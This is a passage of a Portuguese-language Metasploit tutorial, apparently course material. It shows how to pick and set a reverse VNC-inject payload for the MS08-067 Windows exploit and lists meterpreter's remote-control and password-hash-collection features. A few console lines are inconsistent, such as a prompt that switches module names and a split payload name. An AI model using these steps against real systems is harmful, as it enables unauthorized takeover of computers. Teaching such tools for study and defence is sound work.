O próximo passo é configurar o payload, que nada mais é do que uma parte do software que permite o controle do sistema-alvo após ser explorado. Nesse caso o exploit transporta o payload para ser utilizado quando a falha do sistema é explorada.

Um dos payloads mais utilizados é o meterpreter. Com ele podemos ativar, no computador remoto, fazer upload e download de arquivos, tirar screenshots e recolher hashes de senhas. Pode-se até mesmo controlar a tela, usando mouse e teclado para usar completamente o computador.

Com o comando show payloads verifica-se os payloads suportados pelo exploit selecionado:

msf wins_ms08_067_netapi > show payloads

O payload selecionado para este exemplo é “vnc inject reverse tcp”:

msf wins_ms08_067_netapi > set PAYLOAD windows/vncinject/reverse_ tcp
payload -> windows/vncinject/reverse_tcp
msf wins_ms08_067_netapi >

Com o comando show targets visualiza-se quais sistemas operacionais são vulneráveis a esse exploit:

msf wins_ms08_067_netapi > show targets
Supported Exploit Targets
=========================
Windows XP SP3 Portuguese - Brasilian (NX)
msf wins_ms04_045 >
Copyright © 2014 AIEC.